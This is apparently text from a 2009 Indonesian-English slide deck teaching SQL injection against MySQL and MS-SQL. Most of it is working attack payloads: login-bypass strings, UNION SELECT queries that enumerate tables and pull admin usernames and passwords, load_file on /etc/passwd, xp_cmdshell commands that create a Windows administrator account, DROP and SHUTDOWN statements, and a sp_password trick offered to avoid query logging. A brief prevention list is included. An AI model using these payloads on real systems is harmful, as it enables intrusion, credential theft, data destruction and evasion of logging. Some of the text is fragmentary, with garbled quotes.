by : nazRuL [at] delaforta.

net


27 maret 2009
Introduction
SQL INJECTION

SQL injection is a code injection technique that exploits a
security vulnerability occurring in the database layer of an
application. The vulnerability is present when user input is
either incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly
typed and thereby unexpectedly executed.
Simple Concept
or 1=1--
or =
' or 1=1#
') or '1'='1--
' or 1=1/*
admin'/*
etc.....
MySQL Injection
1. Input yang tak tervalidasi
2. Penambahan tanda petik ()
3. Pengujian dengan Query AND
INJECTION...
CARI JUMLAH TABEL
=> ORDER BY
CARI LETAK KOLOM
=> UNION SELECT
CARI NAMA TABLE
> information.schema
> limit
> group_concat

INJECTION (Continue...)
CARI NAMA KOLOM
> information.schema
> table_name == hexa_string
> limit
> group_concat

* Lets Get the XxX..
THE SECRET

DIBALIK
table information .schema

* Magic Query
.:. load_file(/path/file);
ex : /etc/passwd
.:. into dumpfile (/path/fle);
Ex : /tmp/blabla > perm 777
/path/yang/diketahui/
Adavanced...
MS-SQL Injection
1. Input yang tak tervalidasi
2. Penambahan tanda petik ()
3. Pengujian dengan Query AND
INJECTION...
Mencari nama-nama tabel
=> having 1=1--
(memanfaatkan error Query SQL)
Memanfaatkan query group by
=> (group by table,table having 1=1--)










INJECTION...
DATA MANIPULATION
* UPDATE
(update table_name set column2 where
column1=n)
* INSERT
(insert into table_name values(n,isi)
* DROP (drop table table_name)
* SHUTDOWN











* Magic Query
.:. Check status user
convert(int,(select+user));--
.:. CMD SheLL queryf
-
* exec+master..xp_cmdshell net user uname pass /add
* exec+master..xp_cmdshell net localgroup administartor uname /add



Adavanced...
Pencegahan
- PHP based
1. Convert all to Int
2. Magic quotes Off
3. <strip_tags>
4. addslashes function
- ASP based
1. Replace to
2. SQL Error Handling

Blind-SQL Injection
Pengertian....
Blind-SQL

# Pencarian table_admin, username ataupun passowrd #

UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.
TABLES
=> WHERE+table_name+NOT+IN+(table_yg_muncul)

UNION+SELECT+1,2,column_name,4+FROM+INFORMATI
ON_SCHEMA.COLUMNS+WHERE+table_name=table_yg_
diinginkan
=> WHERE+table_name='user'+AND+ column_name+NOT+
IN+(column_yg_muncul)

UNION+SELECT+1,2,user,pass,4+FROM+table_admin






# Tips

# Mengunakan Concatenation
untuk menampilkan field dengan banyak column_name

ID+:+username+:+userpass

( ID%2B':'%2Busername%2B':'%2Buserpass )

# Menggunakan --sp_password
sp_password berfungsi agar mssql tidak melakukan logs query pada
mssql ( kemungkinan hanya terlog pada server)
> sering di temui pada web aplication: asp,cfm,aspx, etc..